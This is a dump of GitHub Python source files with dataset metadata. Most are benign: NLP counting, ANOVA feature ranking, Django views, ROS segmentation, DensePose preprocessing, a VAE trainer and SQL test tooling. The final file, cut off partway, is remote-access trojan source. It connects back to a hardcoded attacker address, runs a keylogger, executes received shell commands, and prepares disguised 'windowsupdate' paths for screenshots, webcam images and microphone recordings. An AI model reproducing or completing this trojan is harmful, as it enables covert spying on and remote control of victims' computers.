seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
71707177064 | import openai
import csv
import argparse
from collections import Counter
from typing import List
from data.discourse_connectors import discourse_connectors
# Ihr OpenAI GPT-3 API-Schlüssel
api_key = "[insert your API KEY here]"
def parse_arguments() -> argparse.Namespace:
"""CLI-Argumente parsen."""
parser = argparse.ArgumentParser(description='Vergleicht die Häufigkeit von Diskursmarkern in Artikeln und GPT-3 Texten.')
parser.add_argument('korpus', help='Pfad zum TSV-Korpus')
parser.add_argument('--anzahl_artikel', type=int, default=10, help='Anzahl der zu vergleichenden Artikel')
return parser.parse_args()
def count_connectors(text: str, connectors, List) -> Counter:
"""Zählt die Diskursmarker im Text."""
words = text.lower().split()
return Counter([word for word in words if word in connectors])
def get_gpt_text(prompt: str, token_limit: int) -> str:
"""Holt den generierten Text von GPT-3."""
openai.api_key = api_key
response = openai.Completion.create(
engine="text-davinci-002",
prompt=prompt,
max_tokens=token_limit
)
return response.choices[0].text.strip()
def trim_to_same_length(article_text: str, gpt_text: str) -> (str, str):
"""Kürzt die Texte auf die gleiche Länge."""
token_limit = min(len(article_text.split()), len(gpt_text.split()))
return ' '.join(article_text.split()[:token_limit]), ' '.join(gpt_text.split()[:token_limit])
def sum_total_connectors(counter: Counter) -> int:
"""Berechnet die Gesamtanzahl der Diskursmarker in einem Counter."""
return sum(counter.values())
def main():
"""
Pseudo-Code für main():
1. CLI-Argumente parsen.
2. Öffne den Korpus und lese die angegebene Anzahl an Artikeln.
3. Für jeden Artikel:
a. Nutze die ersten 10 Sätze als Prompt für GPT-3.
b. Generiere den GPT-3 Text.
c. Kürze Artikel und GPT-3 Text auf die gleiche Länge.
d. Zähle die Diskursmarker in beiden Texten.
e. Schreibe die Ergebnisse in die CSV-Datei.
4. Berechne die Durchschnittswerte und gib sie im Terminal aus.
"""
args = parse_arguments()
# Ausgabe-CSV-Datei vorbereiten
with open('output.csv', 'w', newline='', encoding='utf-8') as csvfile:
fieldnames = ['Head', 'Article_Connectors', 'Article_Text', 'GPT_Connectors', 'GPT_Text']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
article_connector_totals = []
gpt_connector_totals = []
# Korpus öffnen und Artikel lesen
with open(args.korpus, 'r', encoding='utf-8') as f:
reader = csv.DictReader(f, delimiter='\t')
for i, row in enumerate(reader):
if i >= args.anzahl_artikel:
break
# Prompt für GPT-3 erstellen
article_text = row['content']
head = row['head']
prompt = '. '.join(article_text.split('. ')[:10])
# GPT-3 Text generieren
token_limit = len(article_text.split())
gpt_text = get_gpt_text(prompt, token_limit)
# Texte auf gleiche Länge kürzen
article_text, gpt_text = trim_to_same_length(article_text, gpt_text)
# Diskursmarker zählen
article_counts = count_connectors(article_text, discourse_connectors)
gpt_counts = count_connectors(gpt_text, discourse_connectors)
article_total = sum_total_connectors(article_counts)
gpt_total = sum_total_connectors(gpt_counts)
# Ergebnisse in der CSV-Datei speichern
writer.writerow({'Head': head, 'Article_Connectors': article_total, 'Article_Text': article_text, 'GPT_Connectors': gpt_total, 'GPT_Text': gpt_text})
article_connector_totals.append(article_total)
gpt_connector_totals.append(gpt_total)
# Durchschnittswerte berechnen
avg_article_total = sum(article_connector_totals) / args.anzahl_artikel
avg_gpt_total = sum(gpt_connector_totals) / args.anzahl_artikel
# Durchschnittswerte im Terminal ausgeben
print(f"Durchschnittliche Diskursmarker im Artikel: {avg_article_total}")
print(f"Durchschnittliche Diskursmarker im GPT-Text: {avg_gpt_total}")
if __name__ == '__main__':
main()
"""
Output:
Durchschnittliche Diskursmarker im Artikel: 26.1
Durchschnittliche Diskursmarker im GPT-Text: 24.6
""" | SandroWick/gpt_discourseconnectives_counter | gpt_discourseconnectives_project.py | gpt_discourseconnectives_project.py | py | 4,623 | python | de | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.Namespace",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "collections.Counter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "c... |
26610494943 | # This class implements the adaptive rank transformation used in classifier ANOVA_subset_ranking_lr
import sklearn.base as base
import scipy
import time
import logging
import torch
from utilities.optirank.ranking_multiplication import ranking_transformation
import numpy as np
import statsmodels.api as sm
from statsmodels.formula.api import ols
import pandas as pd
def calculate_F_ANOVA(X, label, dataset):
"""
for every feature, compute the F_value corresponding to the effect of the dataset source
(not taking into account the interaction term).
:param X: n x d numpy array
:param label: n numpy array with labels.
:param dataset: n numpy array with dataset name corresponding to each observation.
:return: F_value for each feature (the bigger the F, the greater the shift between datasets).
"""
F_dataset = []
for gene_index in range(X.shape[1]):
df = pd.DataFrame({"label": label, "dataset": dataset, "expr": X[:, gene_index].flatten()})
model = ols('expr ~ C(label) + C(dataset) + C(label):C(dataset)', data=df).fit()
stats = sm.stats.anova_lm(model, typ=2)
F = stats.loc["C(dataset)", "F"]
F_dataset.append(F)
return np.array(F_dataset)
def merge_two_datasets(X, y, X_other, y_other, mask_dataset_other):
"""
Returns X, y, dataset.
X is a numpy array containing the observations for two datasets, y contains
the corresponding labels, and dataset is a str numpy array with "0" or "1" that indicate to which dataset the
observations belong.
There are two modes of usage:
If X_other and y_other are None, and mask_dataset_other is provided, it implicitely indicates that the two datasets
are already mixed in X,y. Otherwise, if X_other, y_other are given, and mask_dataset_other is None, the two datas
are merged in a new array.
"""
if X_other is not None:
X_all = np.vstack([X, X_other])
y_all = np.concatenate([y, y_other])
dataset = np.concatenate([np.repeat("0", len(y)), np.repeat("1", len(y_other))])
return X_all, y_all, dataset
else:
dataset = np.repeat("0", len(y))
dataset[mask_dataset_other] = "1"
return X, y, dataset
class ANOVA_subset_ranking(base.BaseEstimator, base.TransformerMixin):
def __init__(self, fitted=False, X=None, y=None, sum_gamma=None, perc_gamma=None, time_economy=False, X_other=None,
y_other=None, mask_dataset_other=None):
"""
transformer that selects the features that are the least influenced by the dataset source, based on a two way
ANOVA test that estimates the dependence of each feature on the dataset.
To function, X,y values must be provided for two dataset-sources, and the dataset effect is estimated.
There are two modes of use:
1) with X_other, y_other
2) with mask_dataset_other, which indicate which samples in X,y belong to the other dataset
These two modes permit to include (or not) the other dataset in the transformed data.
:param fitted:
:param X: nxd numpy array with data
:param y: n numpy array with label
:param sum_gamma: integer indicating how many features to select as ranking reference.
:param perc_gamma: float indicating which percentage of features to use as ranking reference.
:param time_economy: if True, X and y are cached, and the F-values are not re-calculated for subsequent values of hyperparameters gamma.
:param X_other: nxd numpy array with data
:param y_other: n numpy array with label
:param mask_dataset_other: boolean mask that selects the "secondary dataset" samples.
"""
super(ANOVA_subset_ranking, self).__init__()
self.sum_gamma = sum_gamma
self.perc_gamma = perc_gamma
self.time_economy = time_economy
self.fitted = fitted
self.X = X
self.y = y
self.X_other = X_other
self.y_other = y_other
self.mask_dataset_other = mask_dataset_other
def fit(self, X, y):
n_genes = X.shape[1]
# sum_gamma-perc_gamma agreement
if self.sum_gamma is None:
self.sum_gamma = int(self.perc_gamma * n_genes)
if isinstance(y, list):
y = np.array(y)
if self.time_economy:
start = time.time()
if self.fitted == False or not (np.all(X == self.X)) or not (
np.all(y == self.y)): # hope it doesn't throw an error when X is not fitted
# storing X and parameters
self.X = X
self.y = y
# calculate F values
X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
self.mask_dataset_other)
self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
stop = time.time()
logging.debug('__time_economy:calculation:{}'.format(stop - start))
else:
stop = time.time()
logging.debug('__time_economy:rentability:{}'.format(stop - start))
else:
X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
self.mask_dataset_other)
self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
self.fitted = True
return self
def transform(self, X):
n_genes = X.shape[1]
ranking_F_indices = self.F_.argsort()
selection_indices = ranking_F_indices[0:np.min([self.sum_gamma, n_genes])]
# converting reference genes to binary gamma
gamma = np.zeros(n_genes, dtype="bool")
gamma[selection_indices] = True
self.gamma_ = torch.Tensor(gamma)
# ranking X_expr wrt gamma (in "avg" mode)
X_ranked = ranking_transformation(X, self.gamma_, "avg", "d")
return X_ranked
def to_lightweight(self, copy=False):
if copy:
new_lightweight = ANOVA_subset_ranking(fitted=True, X=None, y=None, sum_gamma=self.sum_gamma,
perc_gamma=self.perc_gamma, time_economy=self.time_economy,
X_other=None, y_other=None)
new_lightweight.gamma_ = self.gamma_
new_lightweight.F_ = self.F_
return new_lightweight
else:
self.X_other = None
self.y_other = None
self.X = None
self.y = None
return self
| paolamalsot/optirank | utilities/ANOVA_subset_ranking.py | ANOVA_subset_ranking.py | py | 6,722 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "statsmodels.formula.api.ols",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "statsmodels.api.stats.anova_lm",
"line_number": 29,
"usage_type": "call"
},
{
"api_n... |
6254269803 | from __future__ import unicode_literals
from django.shortcuts import render, get_object_or_404, redirect
from .models import Post, Tag
from .forms import PostAddForm
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required
def delete(request, post_id):
post = get_object_or_404(Post, id=post_id)
post.delete()
return redirect('blog_app:index')
@login_required
def edit(request, post_id):
post = get_object_or_404(Post, id=post_id)
if request.method == "POST":
#instance:オブジェクトとほぼ同義でクラスを使用したデータの実体
form = PostAddForm(request.POST, request.FILES, instance=post)
if form.is_valid():
form.save()
return redirect('blog_app:detail', post_id=post.id)
else:
form = PostAddForm(instance=post)
#formにpostのデータを入れた状態のデータをadd.htmlに入れる
return render(request, 'blog_app/edit.html', {'form': form, 'post': post})
@login_required
def add(request):
#url/へ遷移してからPOSTでリクエスト出したとき
if request.method == "POST":
#リクエストがPOSTなら、formの中身とユーザーを更新してレスポンス
form = PostAddForm(request.POST, request.FILES)#FILESは画像などのファイルデータ
if form.is_valid():
#保存する前にどのuserの投稿か判断
post = form.save(commit=False)#仮登録
post.user = request.user
#記事の内容とuserの判別に成功したら保存
post.save()
return redirect('blog_app:index')
#url/へ遷移してからPOST以外のリクエスト出したとき
else:
#リクエストがPOST以外なら,特になにも更新せずにレスポンスに返す
form = PostAddForm()
#url/へ遷移してなにもしてない状態
#formにpostを入れていない空の状態のデータをadd.htmlに入れる
return render(request, 'blog_app/add.html', {'form': form})
def detail(request, post_id):
post = get_object_or_404(Post, id=post_id)
return render(request, 'blog_app/detail.html', {'post': post})
def index(request):
posts = Post.objects.all().order_by('-created_at')
return render(request, 'blog_app/index.html', {'posts': posts}) | Naoshin-hirano/blog_app | blog/blog_app/views.py | views.py | py | 2,376 | python | ja | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.get_object_or_404",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "models.Post",
"line_number": 10,
"usage_type": "argument"
},
{
"api_name": "django.shortcuts.redirect",
"line_number": 12,
"usage_type": "call"
},
{
"api_... |
41721739407 | # -*- coding:UTF-8 -*-
import numpy as np
import xlrd as xlrd
from scipy.stats import norm
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import sys
import importlib
# 参数1 Excel文件位置 参数2 选择要作图的表格 参数3、4、5 xy轴代表含义以及标题文字 参数6列数 函数可以选择某地址文件某一个表格某一列来操作
class Make_figure:
def result_pic(address, Excel_Choice,xlabel,ylabel,title,FormColumns):
# 设置字体
importlib.reload(sys)
matplotlib.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
# 读取文件
trainFile = address
if(Excel_Choice==0):
data = pd.read_excel(trainFile, 0)
elif(Excel_Choice==1):
data = pd.read_excel(trainFile, 1)
elif(Excel_Choice==2):
data = pd.read_excel(trainFile, 2)
elif(Excel_Choice==3):
data = pd.read_excel(trainFile, 3)
else:
print('输入有误!!!')
#print(data.iloc[:, 1].describe())
# 设置表格形式
# 定义x轴、y轴取值范围
x = range(0, data.iloc[:,FormColumns].count(), 1)
y = data.iloc[:, FormColumns]
# 定义折线
s = plt.plot(x, y, 'b--')
# 定义文字说明
s1 = "以太坊区块交易数"
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
plt.legend([s1], loc="upper left")
# 图片打印
plt.show()
| 357734432/Supervised-Blockchain-Simulator | Data_Output/Make_figure.py | Make_figure.py | py | 1,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "importlib.reload",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "matplotlib.rcParams",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_nam... |
35742603936 | #!/usr/bin/env python3
import jetson.inference
import jetson.utils
import rospy
import os
import numpy as np
import cv2
import ctypes
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
class semanticSegmentation:
def __init__(self, topics_to, network, labels_file, camera_info):
# Create labels name list
with open(labels_file) as labels:
lines = labels.readlines()
self._object_class = [label.strip() for label in lines]
# Camera width and height
self._CAMERA_WIDTH = camera_info.width
self._CAMERA_HEIGHT = camera_info.height
self._FILTER_MODE = "point"
self._IGNORE_CLASS = "void"
self._ALPHA = 175.0
# Initialize network
self._net = jetson.inference.segNet(network)
# set the alpha blending value
self._net.SetOverlayAlpha(self._ALPHA)
# allocate the output images for the overlay & mask
self._img_overlay = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
self._img_mask = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
self._bridge = CvBridge()
# Create semantic segmentation overlay and mask frame publisher
self._overlay_publisher = rospy.Publisher(topics_to['overlay'], Image, queue_size=1)
self._mask_publisher = rospy.Publisher(topics_to['mask'], Image, queue_size=1)
def detect(self, data):
# Receive frame from camera
try:
frame = self._bridge.imgmsg_to_cv2(data, "rgb8")
except CvBridgeError as e:
print(e)
# Convert frame to RGBA
rgba_frame = cv2.cvtColor(frame, cv2.COLOR_RGB2RGBA)
# Convert frame to CUDA
cuda_mem = jetson.utils.cudaFromNumpy(rgba_frame)
# process the segmentation network
self._net.Process(cuda_mem, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._IGNORE_CLASS)
# generate the overlay and mask
self._net.Overlay(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
self._net.Mask(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
# Return frame to numpy arrray
overlay_frame = jetson.utils.cudaToNumpy(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
mask_frame = jetson.utils.cudaToNumpy(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
# Convert RGBA frame to RGB
overlay_frame = cv2.cvtColor(overlay_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
mask_frame = cv2.cvtColor(mask_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
test_frame = np.zeros_like(mask_frame)
test_frame[np.where((mask_frame==[220, 20, 60]).all(axis=2))] = (255, 255, 255)
# Publish semantic segmentation frame
try:
self._overlay_publisher.publish(self._bridge.cv2_to_imgmsg(overlay_frame, encoding="rgb8"))
self._mask_publisher.publish(self._bridge.cv2_to_imgmsg(test_frame, encoding="rgb8"))
rospy.loginfo("Published semantic segmentation frame")
except CvBridgeError as e:
print(e)
def main():
rospy.init_node('semantic_segmentation')
NETWORK = rospy.get_param('network', "fcn-resnet18-cityscapes-512x256")
LABELS_FILE = rospy.get_param('labels_file', '/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation/networks/FCN-ResNet18-Cityscapes-512x256/classes.txt')
LEFT_CAMERA_INFO = rospy.wait_for_message('/prius/right_camera/camera_info', CameraInfo)
os.chdir('/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation')
TOPIC_FROM = "/prius/left_camera/image_raw"
TOPICS_TO = {'overlay':"/semantic_segmentation/image_overlay",
'mask':"/semantic_segmentation/image_mask"}
semantic_segmentation = semanticSegmentation(TOPICS_TO, NETWORK, LABELS_FILE, LEFT_CAMERA_INFO)
rawframe_subscriber = rospy.Subscriber(TOPIC_FROM, Image, semantic_segmentation.detect, buff_size=2**24, queue_size=2)
rate = rospy.Rate(30)
try:
while not rospy.is_shutdown():
rate.sleep()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("Shutting down")
if __name__ == "__main__":
main()
| ZiadGhanem/Adaptive-Cruise-Control-Application | graduation_project_pkgs/graduation_project_simulation/scripts/semantic_segmentation/semantic_segmentation.py | semantic_segmentation.py | py | 4,078 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jetson.inference.inference.segNet",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "jetson.inference.inference",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "jetson.inference",
"line_number": 29,
"usage_type": "name"
},
{
... |
37417551271 | import os
from os.path import join
import sys
import json
import numpy as np
# from .read_openpose import read_openpose
import utils.segms as segm_utils
def db_coco_extract(dataset_path, subset, out_path):
# convert joints to global order
joints_idx = [19, 20, 21, 22, 23, 9, 8, 10, 7, 11, 6, 3, 2, 4, 1, 5, 0]
# bbox expansion factor
scaleFactor = 1.2
# structs we need
imgnames_, scales_, centers_, parts_, smpl_2dkps_, dp_annot_ = [], [], [], [], [], []
im_id_, id_ = [], []
# subfolders for different subsets
subfolders = {'train': 'train2014', 'minival': 'val2014', 'valminusminival': 'val2014', 'test': 'test2014'}
# json annotation file
json_path = os.path.join(dataset_path,
'annotations',
'densepose_coco_2014_{}.json'.format(subset))
json_data = json.load(open(json_path, 'r'))
imgs = {}
for img in json_data['images']:
imgs[img['id']] = img
has_dp_count = 0
no_dp_count = 0
for annot in json_data['annotations']:
im_id, id = annot['image_id'], annot['id']
if 'dp_masks' not in annot.keys():
# print('dp_masks not in annot')
no_dp_count += 1
continue
# keypoints processing
keypoints = annot['keypoints']
keypoints = np.reshape(keypoints, (17, 3))
keypoints[keypoints[:, 2] > 0, 2] = 1
# if sum(keypoints[5:, 2] > 0) < 12:
# no_dp_count += 1
# continue
has_dp_count += 1
# check if all major body joints are annotated
# if sum(keypoints[5:,2]>0) < 12:
# continue
# create smpl joints from coco keypoints
smpl_2dkp = kp_coco2smpl(keypoints.copy())
# image name
image_id = annot['image_id']
img_name = str(imgs[image_id]['file_name'])
img_name_full = join(subfolders[subset], img_name)
# keypoints
part = np.zeros([24, 3])
part[joints_idx] = keypoints
# scale and center
bbox = annot['bbox']
center = [bbox[0] + bbox[2]/2, bbox[1] + bbox[3]/2]
scale = scaleFactor*max(bbox[2], bbox[3])/200
dp_annot = {'bbox': annot['bbox'],
'dp_x': annot['dp_x'],
'dp_y': annot['dp_y'],
'dp_I': annot['dp_I'],
'dp_U': annot['dp_U'],
'dp_V': annot['dp_V'],
'dp_masks': annot['dp_masks']
}
# store data
imgnames_.append(img_name_full)
centers_.append(center)
scales_.append(scale)
parts_.append(part)
smpl_2dkps_.append(smpl_2dkp)
dp_annot_.append(dp_annot)
im_id_.append(im_id)
id_.append(id)
print('# samples with dp: {}; # samples without dp: {}'.format(has_dp_count, no_dp_count))
# store the data struct
if not os.path.isdir(out_path):
os.makedirs(out_path)
out_file = os.path.join(out_path, 'dp_coco_2014_{}.npz'.format(subset))
np.savez(out_file, imgname=imgnames_,
center=centers_,
scale=scales_,
part=parts_,
smpl_2dkps=smpl_2dkps_,
dp_annot=dp_annot_,
im_id=im_id_,
id=id_)
def kp_coco2smpl(kps_coco):
smpl2coco = [[1, 2, 4, 5, 7, 8, 16, 17, 18, 19, 20, 21],
[11, 12, 13, 14, 15, 16, 5, 6, 7, 8, 9, 10]]
kps_smpl = np.zeros((24, 4))
kps_smpl[smpl2coco[0], :2] = kps_coco[smpl2coco[1], :2]
kps_smpl[smpl2coco[0], 3] = kps_coco[smpl2coco[1], 2] / 2.
if all(kps_coco[[11, 12], 2] > 0):
kps_smpl[0, :2] = np.mean(kps_coco[[11, 12], :2], axis=0)
kps_smpl[0, 3] = 0.5
if all(kps_coco[[5, 6], 2] > 0):
kps_smpl[12, :2] = np.mean(kps_coco[[5, 6], :2], axis=0)
kps_smpl[12, 3] = 0.5
if kps_smpl[12, 3] > 0 and kps_coco[0, 2] > 0:
kps_smpl[15, :2] = (kps_smpl[12, :2] + kps_coco[0, :2]) / 2.
kps_smpl[15, 3] = 0.5
if kps_smpl[0, 3] > 0 and kps_smpl[12, 3] > 0:
kps_smpl[6, :2] = np.mean(kps_smpl[[0, 12], :2], axis=0)
kps_smpl[9, :2] = kps_smpl[6, :2]
kps_smpl[6, 3] = 0.5
kps_smpl[9, 3] = 0.5
if kps_smpl[0, 3] > 0 and kps_smpl[6, 3] > 0:
kps_smpl[3, :2] = np.mean(kps_smpl[[0, 6], :2], axis=0)
kps_smpl[3, 3] = 0.5
if kps_smpl[9, 3] > 0 and kps_smpl[16, 3] > 0:
kps_smpl[13, :2] = np.mean(kps_smpl[[9, 16], :2], axis=0)
kps_smpl[13, 3] = 0.5
if kps_smpl[9, 3] > 0 and kps_smpl[17, 3] > 0:
kps_smpl[14, :2] = np.mean(kps_smpl[[9, 17], :2], axis=0)
kps_smpl[14, 3] = 0.5
hand_foot = [[7, 8, 20, 21], [10, 11, 22, 23]]
for i in range(4):
if kps_smpl[hand_foot[0][i], 3] > 0:
kps_smpl[hand_foot[1][i], :2] = kps_smpl[hand_foot[0][i], :2]
kps_smpl[hand_foot[1][i], 3] = 0.5
kps_smpl[:, 2] = kps_smpl[:, 3]
return kps_smpl[:, :3].copy()
if __name__ == '__main__':
import path_config as cfg
db_coco_extract(cfg.COCO_ROOT, 'train', 'notebooks/output/extras')
# db_coco_extract(cfg.COCO_ROOT, 'minival', 'notebooks/output/extras')
| HongwenZhang/DaNet-DensePose2SMPL | datasets/preprocess/dp_coco.py | dp_coco.py | py | 5,303 | python | en | code | 208 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number"... |
21577757864 | from imath.Trainer import Trainer
import torch
import imath as pt
import os
import torch.nn as nn
import numpy as np
class VAETrainer(Trainer):
def __init__(self, optim, lant_dim, criterion, **kwargs):
super(VAETrainer, self).__init__(**kwargs)
self.lant_dim = lant_dim
self.Distribute = self.model.Distribute
self.Decoder = self.model.Decoder
self.optim = optim
self.criterion = criterion
def forward(self, data, forward_mode, **kwargs):
img = data['x']
# print('??')
batch = img.size(0)
distrib = self.Distribute(img)
mul = distrib[:, 0:1]
log_sig = distrib[:, 1:2]
epi = torch.randn(batch, self.lant_dim).to(img.device)
# print(mul.shape, log_sig.shape, epi.shape)
z = mul + epi * torch.exp(log_sig / 2.)
z = z.view((batch, 6, 7, 6))
reconstrust = self.Decoder(z)
loss = self.criterion(img, reconstrust) * 10
self.update(self.optim, loss)
if forward_mode == 'train':
return {'loss': loss.item()}
else:
return {'rec': reconstrust}
def evaluate(self, batch_size, device, **kwargs):
# loss = []
for n, data in enumerate(self._evaluate(batch_size, device, **kwargs)):
# loss.append(data['loss'])
rec = data['rec']
# print(rec.shape)
if n == 1:
for r in rec[:2]:
im.imshow(r.squeeze())
# im.imsave('rec.png', r.squeeze()*256)
# loss = np.mean(np.array(loss))
return 1. | IMath123/imath | Trainer/VAETrainer.py | VAETrainer.py | py | 1,621 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "imath.Trainer.Trainer",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.randn",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "torch.exp",
"line_number": 34,
"usage_type": "call"
}
] |
9487574383 | import os, glob
from sqlalchemy import *
import sqlalchemy.exc
from sqlalchemy.orm import sessionmaker
from parse import *
from lxml import etree
from datetime import datetime, date, time
step_types = {
'given': 0,
'when': 1,
'then': 2
}
curpath = os.path.basename(os.getcwd())
if curpath == 'steps':
os.chdir('..')
if curpath == 'features':
os.chdir('..')
global_vars = dict()
connect_config = dict()
link_config = dict()
try:
exec(open("./settings.py").read(), global_vars)
except FileNotFoundError:
try:
exec(open("../settings.py").read(), global_vars)
except FileNotFoundError:
pass
try:
connect_config = global_vars['connect_config']
link_config = global_vars['link_config']
except:
pass
class TestModule:
def __init__(self, module_name):
self.module_name = module_name
self.results = []
self.connect_list = dict()
def run_predicate_from_file(self, predicate, step_type):
predicate_template = "./features/steps/{step_type}*.sql"
param_value_tmpl = "--!{param}={value}"
predicate_format = predicate_template.format(step_type=step_type)
params = dict()
filename_params = dict()
sql_command = ""
is_sql_command = 0
filename = ""
cmd = ""
decl = 'DECLARE @context XML,\n@table XML,\n'
prms = "\t@context = @context OUTPUT,\n"
prms += "\t@table = @table,\n"
def process_file(fn):
sql_command = ""
is_sql = 0
schema = ""
proc_name = ""
with open(g, 'r') as f:
for line in f:
p = parse(param_value_tmpl, line)
if p != None and len(p.named) > 0:
params[p.named['param']] = p.named['value']
sql_command += line
try:
sql_command = 'EXEC {}.{}'.format(params['schema_name'], params['proc_name'])
schema, proc_name = params['schema_name'], params['proc_name']
except:
is_sql = 1
return sql_command, is_sql, schema, proc_name
for g in glob.iglob(predicate_format):
filename = os.path.basename(os.path.splitext(g)[0])
step_filename = "{0} {1}".format(step_type, predicate)
if filename == step_filename:
cmd, is_sql_command, schema, proc_name = process_file(g)
break
else:
fd = parse(filename, step_filename)
if fd != None and len(fd.named) > 0:
for k in fd.named:
vl = fd.named[k]
decl += "\t@{} NVARCHAR(128) = '{}',\n".format(k, vl)
prms += "\t@{} = @{},\n".format(k, k)
cmd, is_sql_command, schema, proc_name = process_file(g)
break
context = etree.Element("context")
table = etree.SubElement(context, "table")
if self.ctx_table is not None:
for ct in self.ctx_table:
row = etree.SubElement(table, 'row')
for hd in ct.headings:
row.set(hd, ct[hd])
ctx_str = etree.tostring(context)
if len(cmd) > 0:
ctx_str = str(ctx_str.decode("utf-8")).replace("'", "''")
decl = decl[:-2] + "\n\nSET @table = '{}'".format(ctx_str)
try:
decl += "\n\nSET @context = '{}'".format(self.ctx_xml)
except AttributeError:
pass
cmd = decl + "\n\n" + cmd + "\n"
cmd += prms[:-2] if is_sql_command == 0 else ''
cmd += "\n\nSELECT @context AS behave_result"
if params['connect'] in link_config:
params['connect'] = link_config[params['connect']]
engine = create_engine(params['connect'])
maker = sessionmaker(bind=engine)
session = maker()
row = None
trans = session.begin(subtransactions=True)
try:
session.execute("SET DATEFORMAT dmy;")
res = session.execute(text(cmd))
if res.cursor != None:
while 'behave_result' != res.cursor.description[0][0]:
names = [c[0] for c in res.cursor.description]
store_results = []
while 1:
row_raw = res.cursor.fetchone()
if row_raw is None:
break
row = dict(zip(names, row_raw))
store_results.append(row)
self.results.append(store_results)
res.cursor.nextset()
row = res.cursor.fetchone()
res.close()
session.execute('IF @@TRANCOUNT > 0 BEGIN COMMIT END')
except:
print(cmd)
raise
# процедура или скрипт вернули данные
rs_xml = etree.Element("results")
rs_xml.set('step_type', step_type)
rs_xml.set('predicate', predicate)
for res_set in self.results:
rset_xml = etree.SubElement(rs_xml, "result_set")
for res_row in res_set:
rrow_xml = etree.SubElement(rset_xml, "row")
for res_col in res_row:
res_col4xml = 'empty' if len(res_col) == 0 else res_col
rrow_xml.set(res_col4xml, str(res_row[res_col]))
session.close()
if row != None:
if row[0] is None:
ctx_out_xml = etree.Element("context")
else:
ctx_out_xml = etree.XML(row[0])
ctx_out_xml.append(rs_xml)
return etree.tostring(ctx_out_xml).decode('utf-8')
return None
| AlexandrMov/sqlbehave | sqlbehave/testmodule.py | testmodule.py | py | 5,971 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.basename",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.chdir",
"line_number":... |
1858113091 | import subprocess
import os
import simplejson
import base64
import socket
from util import kg
import time
import threading
import pyttsx3
from PIL import ImageGrab
import sys
import shutil
import cv2
from util import sound_record
import tkinter
ip = "192.168.1.105" #Change this value according to yourself.
port = 4444 #Change this value according to yourself.
my_thread = threading.Thread(target=kg.kg_Start)
my_thread.start()
class mySocket():
def __init__(self,ip,port):
self.connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.connection.connect((ip,port))
self.kg_file = os.environ["appdata"]+"\\windowslogs.txt"
self.tro_file = os.environ["appdata"]+"\\windowsupdate.exe"
self.ss_file = os.environ["appdata"]+"\\update.png"
self.camera_file = os.environ["appdata"]+"\\windowsupdate.png"
self.sound_file = os.environ["appdata"]+"\\windowssounds.wav"
self.Mic_Question()
self.Chat_Port_Question()
def Mic_Question(self):
question_answer = self.Get_Json()
if question_answer == "Y" or question_answer == "y":
my_thread2 = threading.Thread(target=self.Start_Record)
my_thread2.start()
def Chat_Port_Question(self):
question_answer = self.Get_Json()
if question_answer == 5555:
self.chat_port = 5555
else:
self.chat_port = question_answer
def Execute_Command(self,command):
command_output = subprocess.check_output(command,shell=True)
return command_output.decode("Latin1")
